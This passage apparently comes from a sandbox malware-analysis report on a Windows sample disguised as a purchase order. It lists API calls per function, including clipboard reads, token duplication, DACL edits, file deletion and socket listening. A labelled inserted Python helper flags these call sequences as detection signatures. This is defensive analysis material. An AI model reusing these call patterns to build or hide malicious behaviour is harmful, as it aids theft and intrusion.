                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE2174
                      • FindClose.KERNEL32(00000000), ref: 00AE2181
                      • FindClose.KERNEL32(00000000), ref: 00AE2191
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1803514871-438819550
                      • Opcode ID: bcec125a33148d231eded3a31e574f8765a69d55050f8579ac2b6ec997b3e25a
                      • Instruction ID: 5745a4249fadd4a0d13c7b0e7139a50c3f98ffa3c15d6aaec052ff712462006d
                      • Opcode Fuzzy Hash: bcec125a33148d231eded3a31e574f8765a69d55050f8579ac2b6ec997b3e25a
                      • Instruction Fuzzy Hash: 0A31AE329402597ACB14ABA5EC49FDE73EC9F09320F1441A6EA15E30A0EB74DF84CB65
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00AE21C0
                      • _wcscmp.LIBCMT ref: 00AE21D5
                      • _wcscmp.LIBCMT ref: 00AE21EC
                        • Part of subcall function 00AD7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AD7621
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00AE221B
                      • FindClose.KERNEL32(00000000), ref: 00AE2226
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00AE2242
                      • _wcscmp.LIBCMT ref: 00AE2269
                      • _wcscmp.LIBCMT ref: 00AE2280
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE2292
                      • SetCurrentDirectoryW.KERNEL32(00B43A68), ref: 00AE22B0
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE22BA
                      • FindClose.KERNEL32(00000000), ref: 00AE22C7
                      • FindClose.KERNEL32(00000000), ref: 00AE22D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 1824444939-438819550
                      • Opcode ID: 84689245723bb0a234f7c99949876c75006601f7e68c308f23e066a2665d71a3
                      • Instruction ID: c7285e6a14b7abf97427890d28f3d64eba094e379254f25baf71c582e673bf88
                      • Opcode Fuzzy Hash: 84689245723bb0a234f7c99949876c75006601f7e68c308f23e066a2665d71a3
                      • Instruction Fuzzy Hash: 1D31D2329412597ACF14EBA5EC49FDE77AC9F45320F144191EA14E30A0EB70DF85CB69
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove_memset
                      • String ID: Q\E$[$\$\$\$]$^
                      • API String ID: 3555123492-286096704
                      • Opcode ID: 9a761e2e822ae448cc74ed7bae01abc95fed227455c09af879a50469da0747b9
                      • Instruction ID: 88c73111549513fce939439f41c4932c0316cfd881ef2dc0416e20eb4d3d9996
                      • Opcode Fuzzy Hash: 9a761e2e822ae448cc74ed7bae01abc95fed227455c09af879a50469da0747b9
                      • Instruction Fuzzy Hash: E472AC71E14219DBDF28CF98C9806EDB7F1FF48314F2481A9D855AB281E774AE81DB90
                      APIs
                        • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                        • Part of subcall function 00ACB8E7: GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                        • Part of subcall function 00ACB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                        • Part of subcall function 00ACB8E7: HeapAlloc.KERNEL32(00000000,?,00ACB3CB,?,?,?), ref: 00ACB923
                        • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                        • Part of subcall function 00ACB982: GetProcessHeap.KERNEL32(00000008,00ACB3E1,00000000,00000000,?,00ACB3E1,?), ref: 00ACB98E
                        • Part of subcall function 00ACB982: HeapAlloc.KERNEL32(00000000,?,00ACB3E1,?), ref: 00ACB995
                        • Part of subcall function 00ACB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ACB3E1,?), ref: 00ACB9A6
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB3FC
                      • _memset.LIBCMT ref: 00ACB411
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ACB430
                      • GetLengthSid.ADVAPI32(?), ref: 00ACB441
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00ACB47E
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB49A
                      • GetLengthSid.ADVAPI32(?), ref: 00ACB4B7
                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ACB4C6
                      • HeapAlloc.KERNEL32(00000000), ref: 00ACB4CD
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ACB4EE
                      • CopySid.ADVAPI32(00000000), ref: 00ACB4F5
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ACB526
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB54C
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB560
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                      • String ID:
                      • API String ID: 3996160137-0
                      • Opcode ID: d8d61d0cea7e1250b9b977454caddfd331dd73ee384ef76deb08be186b3e1136
                      • Instruction ID: edc7c5d35c98157531a4db0f8736b7111a8211bf1cc9b3f712cd3982697eba45
                      • Opcode Fuzzy Hash: d8d61d0cea7e1250b9b977454caddfd331dd73ee384ef76deb08be186b3e1136
                      • Instruction Fuzzy Hash: 03513A75910209ABDF04DFA5DC5AEEEBB79FF08300F05812DE916A7291DB369A05CB60
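                      Added example, not part of the Joe Sandbox report or of the sample's code. The records above are static per-function API listings, and this binary carries the AutoIt runtime (the AU3!, EA06 and >>>AUTOIT SCRIPT<<< strings and the PCRE option names in nearby records), so sequences such as FindWindowW(Shell_TrayWnd) / AttachThreadInput / keybd_event(0x12) / SetForegroundWindow, DuplicateTokenEx / OpenWindowStationW(winsta0) / OpenDesktopW(default), OpenClipboard / GetClipboardData and GetSecurityDescriptorDacl / AddAce / SetUserObjectSecurity are consistent with the interpreter's own built-ins (window activation with the Alt-key foreground-lock workaround, RunAs with desktop access grants, clipboard read); the embedded script may or may not call them, and the behaviour signatures at the top of the report are the evidence of what actually ran. The Python below, written for this page, groups the report's bullet lines into records, flags those call sequences, and decodes the numeric arguments worth reading: the 0x12 virtual key (VK_MENU), the clipboard formats, the DuplicateTokenEx impersonation level and token type, and the access masks 0x60000 and 0x60081, which both include WRITE_DAC, the right the DACL-editing function needs. The signature labels and the abridged REPORT text are constructed for the example.

```python
"""Added triage helper (not from the Joe Sandbox report or the sample):
parse per-function 'APIs' bullets and flag Win32 call sequences.
Signature labels and the REPORT excerpt are constructed for this example."""
import re

# Constructed excerpt, abridged from the API bullets shown on this page.
REPORT = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B04388
• SetForegroundWindow.USER32(000000FF), ref: 00B043A8
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043E2
• keybd_event.USER32(00000012,00000000), ref: 00B04415
Memory Dump Source
APIs
  • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ACBA86
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ACBAAE
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ACBAEB
APIs
• OpenClipboard.USER32(00B2DBF0), ref: 00AE70C3
• GetClipboardData.USER32(0000000D), ref: 00AE70D9
• CloseClipboard.USER32 ref: 00AE7283
APIs
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB3FC
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB49A
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB54C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB560
"""

# One bullet: optional "Part of subcall function XXXX:" prefix, Api.MODULE,
# optional "(args)", then "ref: <address>".
LINE_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Every API in a set must appear among a record's direct (non-subcall) calls.
SIGNATURES = {
    "focus steal: AttachThreadInput + synthetic Alt + SetForegroundWindow":
        {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "run-as: duplicate token, open winsta0/default desktop":
        {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    "clipboard read": {"OpenClipboard", "GetClipboardData"},
    "window station/desktop DACL edit":
        {"GetSecurityDescriptorDacl", "AddAce", "SetUserObjectSecurity"},
}
# (api, zero-based arg index) -> exact-value meanings.
VALUES = {
    ("keybd_event", 0): {0x12: "VK_MENU (Alt)"},
    ("GetClipboardData", 0): {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"},
    ("DuplicateTokenEx", 3): {2: "SecurityImpersonation"},
    ("DuplicateTokenEx", 4): {1: "TokenPrimary"},
}
# (api, arg index) -> access-mask bits (standard rights + desktop rights).
FLAGS = {
    ("OpenWindowStationW", 2): [(0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC")],
    ("OpenDesktopW", 3): [(0x1, "DESKTOP_READOBJECTS"), (0x80, "DESKTOP_WRITEOBJECTS"),
                          (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC")],
}

def parse_records(text):
    """Group bullets into records; a new record starts at each 'APIs' header."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = LINE_RE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append({"api": m["api"], "module": m["mod"], "args": args,
                            "ref": m["ref"], "subcall": m["sub"] is not None})
    return [r for r in records if r]

def match_signatures(records):
    """Return (ref of the record's first direct call, label) for every hit."""
    hits = []
    for rec in records:
        direct = [c for c in rec if not c["subcall"]]
        if not direct:
            continue
        names = {c["api"] for c in direct}
        for label, needed in SIGNATURES.items():
            if needed <= names:
                hits.append((direct[0]["ref"], label))
    return hits

def decode_constants(records):
    """Translate known numeric arguments; '?' and string arguments are skipped."""
    notes = []
    for rec in records:
        for c in rec:
            for idx, raw in enumerate(c["args"]):
                try:
                    val = int(raw, 16)
                except ValueError:
                    continue
                key = (c["api"], idx)
                if key in VALUES and val in VALUES[key]:
                    notes.append((c["ref"], c["api"], VALUES[key][val]))
                elif key in FLAGS:
                    notes.append((c["ref"], c["api"],
                                  "|".join(n for bit, n in FLAGS[key] if val & bit)))
    return notes

if __name__ == "__main__":
    recs = parse_records(REPORT)
    for ref, label in match_signatures(recs):
        print(f"{ref}: {label}")
    for ref, api, meaning in decode_constants(recs):
        print(f"{ref}: {api} -> {meaning}")
```

                      To run it over a full report, paste the "APIs" blocks of the function listing into REPORT, or read them from a saved copy of the page; records whose only listed calls are "Part of subcall function" lines are skipped on purpose, since those calls belong to a callee that has its own record.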
                      APIs
                        • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                        • Part of subcall function 00AD7C0C: GetFileAttributesW.KERNEL32(?,00AD6A7B), ref: 00AD7C0D
                      • _wcscat.LIBCMT ref: 00AD6E7E
                      • __wsplitpath.LIBCMT ref: 00AD6E99
                      • FindFirstFileW.KERNEL32(?,?), ref: 00AD6EAE
                      • _wcscpy.LIBCMT ref: 00AD6EDD
                      • _wcscat.LIBCMT ref: 00AD6EEF
                      • _wcscat.LIBCMT ref: 00AD6F01
                      • DeleteFileW.KERNEL32(?), ref: 00AD6F0E
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD6F22
                      • FindClose.KERNEL32(00000000), ref: 00AD6F3D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                      • String ID: \*.*
                      • API String ID: 2643075503-1173974218
                      • Opcode ID: 7a24ef3bb3db3e8a39114de30fceb95004af9ce44df42cc2851efeba9516e5d5
                      • Instruction ID: 15b48c53930a1b954a087b231504f4b589ab9228447fdd67d57ac1024e6f865d
                      • Opcode Fuzzy Hash: 7a24ef3bb3db3e8a39114de30fceb95004af9ce44df42cc2851efeba9516e5d5
                      • Instruction Fuzzy Hash: D321BF72409384AAC610EBA098849DBBBEC9B99314F444E1BF5D5C3152EB34D60D87A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                      • API String ID: 0-2893523900
                      • Opcode ID: c221ea166262743d09dfeb16418c88996ce8676b214c2bc42bd2d2517efa610b
                      • Instruction ID: d52784f377abacd1f26a343ae7f1f024e4b032b043fabb28751962423d6661e3
                      • Opcode Fuzzy Hash: c221ea166262743d09dfeb16418c88996ce8676b214c2bc42bd2d2517efa610b
                      • Instruction Fuzzy Hash: 9F624071E002159BDF24CF59C8817EEB7F5EF48710F6481AAE855EB281EB749E81CB90
                      APIs
                        • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF317F
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AF321E
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AF32B6
                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00AF34F5
                      • RegCloseKey.ADVAPI32(00000000), ref: 00AF3502
                      Similarity
                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                      • String ID:
                      • API String ID: 1240663315-0
                      • Opcode ID: ee52ec3da09908981546254f22186bbacd6b1bc4420a1dbe0fdefa3c582c56a0
                      • Instruction ID: 299079c357680e1b21383c3011c7000e0ade67cf8e5f25a2072b0b6b3061223c
                      • Opcode Fuzzy Hash: ee52ec3da09908981546254f22186bbacd6b1bc4420a1dbe0fdefa3c582c56a0
                      • Instruction Fuzzy Hash: 3DE17B35204204AFCB15DF68C995E2ABBF8EF89314F04896DF54ADB261DB30EE41CB52
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: a1572147474c742bf4f4c8528647c05639632c3980811f72017185fb13f4bb3c
                      • Instruction ID: 9c30609ba24ee1f31221277024618338d60315d870c1a2a044e5ac371205b05e
                      • Opcode Fuzzy Hash: a1572147474c742bf4f4c8528647c05639632c3980811f72017185fb13f4bb3c
                      • Instruction Fuzzy Hash: 9021AE31704212AFDB10AF65DD59BAE7BA8EF44721F44801AF90ADB2A1DF74ED409B90
                      APIs
                        • Part of subcall function 00ACA857: CLSIDFromProgID.OLE32 ref: 00ACA874
                        • Part of subcall function 00ACA857: ProgIDFromCLSID.OLE32(?,00000000), ref: 00ACA88F
                        • Part of subcall function 00ACA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00ACA89D
                        • Part of subcall function 00ACA857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00ACA8AD
                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00AEC6AD
                      • _memset.LIBCMT ref: 00AEC6BA
                      • _memset.LIBCMT ref: 00AEC7D8
                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00AEC804
                      • CoTaskMemFree.OLE32(?), ref: 00AEC80F
                      Strings
                      • NULL Pointer assignment, xrefs: 00AEC85D
                      Similarity
                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                      • String ID: NULL Pointer assignment
                      • API String ID: 1300414916-2785691316
                      • Opcode ID: 2256cbc7b44b3b2cb078f0a72e914fe74c361b03c72a1a3b39f3f44b06e2e429
                      • Instruction ID: a4a38d484dd3c68db47421707660916ce6c0f1bc3341176d864a9a2bad6aa724
                      • Opcode Fuzzy Hash: 2256cbc7b44b3b2cb078f0a72e914fe74c361b03c72a1a3b39f3f44b06e2e429
                      • Instruction Fuzzy Hash: 6E913971D00218ABDF10DFA5DD81EDEBBB9EF08720F20416AF519A7291DB705A45CFA0
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AE24F6
                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00AE2526
                      • _wcscmp.LIBCMT ref: 00AE253A
                      • _wcscmp.LIBCMT ref: 00AE2555
                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00AE25F3
                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00AE2609
                      Similarity
                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                      • String ID: *.*
                      • API String ID: 713712311-438819550
                      • Opcode ID: c91eebde29c7d4454dab4149385f8b2e7db42fa3779c354a97a82daad0c298b7
                      • Instruction ID: 91514228ed72caecc0bad43c342b34c438d53d78cd16fb66df0075fb2c522243
                      • Opcode Fuzzy Hash: c91eebde29c7d4454dab4149385f8b2e7db42fa3779c354a97a82daad0c298b7
                      • Instruction Fuzzy Hash: 9F417B7190025AAFCF21DFA5CD59BEEBBB8FF04310F244456E815A2191EB349A94CBA0
                      Similarity
                      • API ID:
                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                      • API String ID: 0-1546025612
                      • Opcode ID: 81be9cf75494b5b0bd5b3ea9287fbae8047be7e1874056813af3a8d188328236
                      • Instruction ID: b27b09a7e2f74f9387977829f92c262a9f950da86f8fe1f67fb5cfb53380f32c
                      • Opcode Fuzzy Hash: 81be9cf75494b5b0bd5b3ea9287fbae8047be7e1874056813af3a8d188328236
                      • Instruction Fuzzy Hash: 78925C75E0021A9BDF24CF58C8807EEBBF1FB54314F6442AAD81AAB284D7749DC1CB91
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 99c28cef3105391e63f19319b975435e5652a40728bb26ddb6f59a7de3860c64
                      • Instruction ID: a568cd564808ca3891e66195fa6ce8470af11f12e46b171ab80dec3bef141391
                      • Opcode Fuzzy Hash: 99c28cef3105391e63f19319b975435e5652a40728bb26ddb6f59a7de3860c64
                      • Instruction Fuzzy Hash: F3129B70A00609DFDF14DFA4DA85AAEB7F5FF48300F208569E806E7291EB35AE15CB50
                      APIs
                        • Part of subcall function 00ACBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ACBF0F
                        • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
                        • Part of subcall function 00ACBEC3: GetLastError.KERNEL32 ref: 00ACBF49
                      • ExitWindowsEx.USER32(?,00000000), ref: 00AD830C
                      Similarity
                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                      • String ID: $@$SeShutdownPrivilege
                      • API String ID: 2234035333-194228
                      • Opcode ID: 2fbf35832192d6e869988537637b4e76e5703ac36ddaf36dc25585a6114492b8
                      • Instruction ID: 59feba3855613717be339bbe3f55665d5ca5fc3af73b2c9637a7064caf5c8426
                      • Opcode Fuzzy Hash: 2fbf35832192d6e869988537637b4e76e5703ac36ddaf36dc25585a6114492b8
                      • Instruction Fuzzy Hash: 8301A271B50315ABE768277C8C5BFFB7268AB05F80F140826F957EA2D2DE689C0081A4
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00AE9235
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9244
                      • bind.WSOCK32(00000000,?,00000010), ref: 00AE9260
                      • listen.WSOCK32(00000000,00000005), ref: 00AE926F
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9289
                      • closesocket.WSOCK32(00000000), ref: 00AE929D
                      Similarity
                      • API ID: ErrorLast$bindclosesocketlistensocket
                      • String ID:
                      • API String ID: 1279440585-0
                      • Opcode ID: 19dd2e70dffa61b083dcd124e1ef81c735b795969642a51495dc7c91cbcb5a18
                      • Instruction ID: 23824a676cadbd376b7fa6643dfa0c4602b0506ecf427cd048e644a6f5f7ce3a
                      • Opcode Fuzzy Hash: 19dd2e70dffa61b083dcd124e1ef81c735b795969642a51495dc7c91cbcb5a18
                      • Instruction Fuzzy Hash: A8218B35600600AFCB10EF68CA85BAEB7E9AF84324F108159FA56AB3D1CB74AD41CB51
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AD6F7D
                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD6F8D
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AD6FAC
                      • __wsplitpath.LIBCMT ref: 00AD6FD0
                      • _wcscat.LIBCMT ref: 00AD6FE3
                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD7022
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                      • String ID:
                      • API String ID: 1605983538-0
                      • Opcode ID: f002f50df738d5f94eea1be0117e97aacc75ba24d281825468d6c1346c340922
                      • Instruction ID: cf0f35cd6866d3fd80ef025bc0ec7380847a4d5d595a5ce65c88d0c399022193
                      • Opcode Fuzzy Hash: f002f50df738d5f94eea1be0117e97aacc75ba24d281825468d6c1346c340922
                      • Instruction Fuzzy Hash: D0218771904218ABDB11ABA0CD89BEEB7BCAB48300F5004EAF505E3241EB759F84DB60
                      APIs
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                      • _memmove.LIBCMT ref: 00B03020
                      • _memmove.LIBCMT ref: 00B03135
                      • _memmove.LIBCMT ref: 00B031DC
                      Similarity
                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                      • String ID:
                      • API String ID: 1300846289-0
                      • Opcode ID: f05f297d5c816278b9f462c3d070022188303493ae5a2d6788703562d59e056b
                      • Instruction ID: 80e736e9c2e9e9b79c5b0359fb402f6d97b7a8010ed1bb6264a4d7c7d2392cb5
                      • Opcode Fuzzy Hash: f05f297d5c816278b9f462c3d070022188303493ae5a2d6788703562d59e056b
                      • Instruction Fuzzy Hash: 57029370A00205DFCF04DF68D985AAE7BF9EF59340F1480AAE806DB295EB31DE55CB91
                      APIs
                        • Part of subcall function 00AEACD3: inet_addr.WSOCK32(00000000), ref: 00AEACF5
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00AE973D
                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00AE9760
                      Similarity
                      • API ID: ErrorLastinet_addrsocket
                      • String ID:
                      • API String ID: 4170576061-0
                      • Opcode ID: 1456ec76e49fe92d5001135c5b8920f2e48634185b8a0914d50a31385afce1a0
                      • Instruction ID: bdf8ab3a8073fa0ac72c4edd6d14a1fe2d5650c904eb99d59b8a77a18f62fc97
                      • Opcode Fuzzy Hash: 1456ec76e49fe92d5001135c5b8920f2e48634185b8a0914d50a31385afce1a0
                      • Instruction Fuzzy Hash: 8841E374A00200AFDB10AF28CE82E6E77EDEF49324F148458F956AB3D2CB749D418B91
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00ADF37A
                      • _wcscmp.LIBCMT ref: 00ADF3AA
                      • _wcscmp.LIBCMT ref: 00ADF3BF
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00ADF3D0
                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00ADF3FE
                      Similarity
                      • API ID: Find$File_wcscmp$CloseFirstNext
                      • String ID:
                      • API String ID: 2387731787-0
                      • Opcode ID: 1b4a248385336dda0f1982c4929732abdfac7d41e1a8b9780e8ccf6a8d248d67
                      • Instruction ID: 1c3c2c5c6d7236464aa7c6a7ab4d17f029aa046d9167ab69ac81c120d210134e
                      • Opcode Fuzzy Hash: 1b4a248385336dda0f1982c4929732abdfac7d41e1a8b9780e8ccf6a8d248d67
                      • Instruction Fuzzy Hash: CF419D756047029FCB08DF28C490E9AB3E8FF49324F10456EE96ACB3A1DB31A945CB91
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AF20EC,?,00AF22E0), ref: 00AF2104
